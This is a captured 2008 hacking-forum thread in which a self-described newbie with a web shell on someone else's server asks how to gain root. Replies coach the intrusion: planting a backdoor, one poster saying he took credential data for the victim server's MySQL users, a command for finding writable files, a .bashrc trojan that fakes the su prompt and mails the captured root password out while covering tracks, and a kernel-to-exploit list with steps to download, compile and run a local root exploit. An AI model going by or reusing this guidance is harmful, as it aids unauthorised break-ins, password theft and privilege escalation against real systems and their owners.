Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 2, 2014
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: qxiaof06
New Today: 0
New Yesterday: 0
Overall: 8954

People Online:
Visitors: 133
Members: 1
Total: 134

Online Now:
01: mixman - Homepage
milw0rm
·[web applications] - Dolphin 7.1.4 SQL Injection Vulnerability
·[web applications] - web2Project 3.1 SQL Injection Vulnerability
·[remote exploits] - Ericom AccessNow Server Buffer Overflow Exploit
·[dos / poc] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[local exploits] - docker 0.11 VMM-container Breakout
·[remote exploits] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[remote exploits] - Rocket Servergraph Admin Center fileRequestor Remote Code Execution
·[web applications] - Motorola SBG901 Wireless Modem - CSRF Vulnerability
·[web applications] - ZTE WXV10 W300- Multiple Vulnerabilities
·[remote exploits] - Java Debug Wire Protocol Remote Code Execution Exploit

read more...
PacketStorm News
·Ubuntu Security Notice USN-2249-1
·Red Hat Security Advisory 2014-0764-01
·Ubuntu Security Notice USN-2248-1
·CDVI ACAC22 Authentication / Denial Of Service
·Red Hat Security Advisory 2014-0763-01
·Red Hat Security Advisory 2014-0762-01
·PayPal SecurityKey Card Serialnumber Module Code Injection
·SugarCRM 6.5.16 XXE Injection
·Debian Security Advisory 2963-1
·Debian Security Advisory 2962-1

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Need HELP "uid=99(nobody) gid=99(nobody) groups=99(nobo
Post new topic  Reply to topic View previous topic :: View next topic 
Need HELP "uid=99(nobody) gid=99(nobody) groups=99(nobo
PostPosted: Mon Dec 01, 2008 5:11 pm Reply with quote
hottox
Regular user
Regular user
 
Joined: Nov 23, 2008
Posts: 19




Hi,
i've got a shell on a web server,
the probleme is that i can't chmod, and i can't find writeable folders || files,

Quote:
Software: Apache/1.3.34 (Unix) PHP/4.4.2 FrontPage/5.0.2.2510

uname -a: Linux ************ 2.4.30-cisec-p5 #49 SMP Tue Jun 7 13:26:43 CDT 2005 i686

uid=99(nobody) gid=99(nobody) groups=99(nobody)

Safe-mode: OFF (not secure)


i'm a newbie, but i think that this server can be rooted,
i can give more information about the server,
please help
Waiting your answers.
View user's profile Send private message Send e-mail MSN Messenger
put a bind backdoor
PostPosted: Mon Dec 01, 2008 7:08 pm Reply with quote
spankyz
Beginner
Beginner
 
Joined: Dec 01, 2008
Posts: 3




if u put a backdoor u can access this in telnet and depends what port...

when ur logged in its easy to use an exploit...

YM me to test some of ur shells...

spankyz202000@ym
View user's profile Send private message
PostPosted: Mon Dec 01, 2008 7:28 pm Reply with quote
lenny
Valuable expert
Valuable expert
 
Joined: May 15, 2008
Posts: 275
Location: United Kingdom




I got hold of the IP of your vulnerable webserver (don't ask :p) and took a quick look around. As you are running as nobody, you have very little control over anything.

I did find one area of great interest though, the phpmyadmin config.inc.php is readable which contained the username and password (in plain text) of a read-only MySQL user (pma control user). Along with details from details from the hosts file and the httpd.conf file, I was able to find a domain on the server hosting phpMyAdmin.

With access to the PMA user (called "mysqlread" on this server If i recall correctly) I was able to read the phpMyAdmin (and MySQL too, I assume) login details for *every* user, including Root.

This is where I stopped however, because I couldn't be bothered to crack the MySQL (version 3) hash that would give me root access (And im not black hat, I refuse to dig any deeper because It would probably lead to big problems for the company involved.)

Also, If human nature rears its ugly head then the sysadmin is probably lazy. Lazy sysadmins usually use the same password for everything, so If you get ahold of the root password for MySQL then you probably have the root password for the entire server as well.

I won't tell you the passwords or where to look for the files - Its simple, find them yourself Smile

Any questions?

(edit, oh - and don't use the C99 shell - Its not exactly subtle and stands out like crazy. Its also a little script-kiddy-like, and you wouldn't want anybody thinking you were a script kiddie would you? Wink )


Last edited by lenny on Mon Dec 01, 2008 7:31 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Mon Dec 01, 2008 7:30 pm Reply with quote
hottox
Regular user
Regular user
 
Joined: Nov 23, 2008
Posts: 19




i said that i can't find writeable folders,
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Mon Dec 01, 2008 7:32 pm Reply with quote
lenny
Valuable expert
Valuable expert
 
Joined: May 15, 2008
Posts: 275
Location: United Kingdom




No, you are running as nobody - you cant chown, chmod or chgrp files that you dont own. Try running this to find writable files Smile
Code:
Find / -perms 2
View user's profile Send private message
PostPosted: Mon Dec 01, 2008 7:47 pm Reply with quote
hottox
Regular user
Regular user
 
Joined: Nov 23, 2008
Posts: 19




Thanks lenny, and i want you to know that i'm not black hate,
i'm looking for a writable folder where i can put a backdoor,
i used
Code:
Find / -perms 2


the result seems to be positif
can i run a perl script from any directory ?????
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Mon Dec 01, 2008 7:55 pm Reply with quote
lenny
Valuable expert
Valuable expert
 
Joined: May 15, 2008
Posts: 275
Location: United Kingdom




ok, try this:
Code:
find / -perm -2 -ls

From here it brings up about 750 writable files and directories

These look usefull, but I didn't investigate:
Quote:
15463 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /www3 -> /home3/www
15464 0 lrwxrwxrwx 1 root root 9 Oct 5 2004 /ftp -> /home/ftp
15465 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /ftp2 -> /home2/ftp
15466 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /ftp3 -> /home3/ftp
15467 0 lrwxrwxrwx 1 root root 19 Oct 5 2004 /.bash_profile -> /root/.bash_profile
15468 0 lrwxrwxrwx 1 root root 13 Oct 5 2004 /.bashrc -> /root/.bashrc
14504 0 lrwxrwxrwx 1 root root 12 Apr 10 2006 /library -> /usr/lib/cgi


and...

Quote:
15460 0 lrwxrwxrwx 1 root root 10 Oct 5 2004 /www2 -> /home2/www
25 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/cgiwrapd -> cgiwrap
26 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/nph-cgiwrap -> cgiwrap
27 0 lrwxrwxrwx 1 root root 7 Oct 5 2004 /home2/www/cgi-bin/nph-cgiwrapd -> cgiwrap
311 0 -rw-rw-rw- 1 root root 0 Nov 9 2001 /home2/www/icons/_vti_pvt/frontpg.lck
419 0 lrwxrwxrwx 1 root root 14 Oct 5 2004 /home2/www/logs -> /var/log/httpd
420 0 lrwxrwxrwx 1 root root 22 Oct 5 2004 /home2/www/phpMyAdmin -> /usr/local/phpMyAdmin/
13566007 0 lrwxrwxrwx 1 root root 13 Nov 15 2005 /home2/www/*/anonftp -> /ftp/*
13566008 0 lrwxrwxrwx 1 * * 22 Nov 15 2005 /home2/www/*/wusage -> /home/*/.wusage
13566011 0 lrwxrwxrwx 1 root root 24 Nov 15 2005 /home2/www/*/error-log -> /var/log/httpd/error_log
13566021 0 lrwxrwxrwx 1 * * 27 Nov 15 2005 /home2/www/*/mail -> /www/*/cgi-bin/wmail
13566024 0 lrwxrwxrwx 1 root * 13 Nov 15 2005 /home2/www/*/* -> /www/*
13566025 0 lrwxrwxrwx 1 * * 21 Nov 15 2005 /home2/www/*/phpMyAdmin -> /usr/local/phpMyAdmin


Had to censor a few directories and files, but shouldn't be hard to work out who is who Smile I replaced the name of a certain user with a single "*" where his name should have been Wink
View user's profile Send private message
PostPosted: Mon Dec 01, 2008 8:35 pm Reply with quote
capt
Advanced user
Advanced user
 
Joined: Nov 04, 2008
Posts: 232




Many servers dont containg the /usr/local/phpmyadmin/ and its config plain as day. Got lucky Razz
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Tue Dec 02, 2008 11:08 am Reply with quote
hottox
Regular user
Regular user
 
Joined: Nov 23, 2008
Posts: 19




i uploaded a BACKDOOR but with no succes Crying or Very sad

I do not want passwords, all I want is to have a shell access "for the first time" Cool
please help
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Tue Dec 02, 2008 4:43 pm Reply with quote
lenny
Valuable expert
Valuable expert
 
Joined: May 15, 2008
Posts: 275
Location: United Kingdom




But as I said, you are running as nobody - you have virtuall no permissions! Even if you get a shell, you are still right back in the same place you started, execpt with a terminal window to look at instead of the C99 shell.

You *need* to gain a few permissions before you can do anything interesting, and the best way to do that is to gain access to a few more accounts.
View user's profile Send private message
PostPosted: Tue Dec 02, 2008 7:10 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Social engineering rockzzzzzzzzz. Laughing
View user's profile Send private message
PostPosted: Tue Dec 02, 2008 7:53 pm Reply with quote
lenny
Valuable expert
Valuable expert
 
Joined: May 15, 2008
Posts: 275
Location: United Kingdom




Indeed it does Smile
View user's profile Send private message
PostPosted: Wed Dec 03, 2008 11:22 am Reply with quote
hottox
Regular user
Regular user
 
Joined: Nov 23, 2008
Posts: 19




as i said "i'm a newbie",so i'll do what you said.
thaaaaanks for help, Very Happy
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Thu Dec 04, 2008 1:37 pm Reply with quote
ToXiC
Moderator
Moderator
 
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




hmmm why dont you try something like this....

CAN be done only if you have access to .bashrc
You can receive the root password on your email in plain text . They only thing you need is user access to modify .bashrc

lets see the procedure step by step:

you first copy the .bashrc to .bashrc. so you can restore it and cover your tracks after you receive the password.

you then modify .bashrc as follows:

.bashrc
alias su=/var/tmp/text.log
echo "Password:";read pass
if [ $pass = "" ] > .es
echo "su: incorrect password"
echo $pass > /tmp/pass.log
mail yourmail@mail.com < /tmp/pass.log
rm /tmp/pass.log
then
rm .es
rm /var/tmp/test.log
cp ~/.bashrc. ~/.bashrc
rm ~/.bashrc.
su
fi
chmod +x /var/tmp/text.log

Smile
Social Engineering - Phishing

_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sun May 10, 2009 9:04 am Reply with quote
xF34Rx
Regular user
Regular user
 
Joined: May 10, 2009
Posts: 23




You gotta root the box.

Code:
uname -a


The output is the server version.Search the numbers on milw0rm.

List of public exploits I know about:

Code:
2.2 ->  ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c(vmsplice)


Let's say it was vulnerable to vmsplice..

Code:
wget http://www.milw0rm.com/exploits/5092


Downloads the exploit.

Code:
gcc 5092 -o exploit


Compiles the exploit.

Code:
./exploit


Executes the exploit.

You should be root by now if its vulnerable.

Just type whoami;id to make sure Wink
View user's profile Send private message
Need HELP "uid=99(nobody) gid=99(nobody) groups=99(nobo
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Nvidia GeForce Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.114 Seconds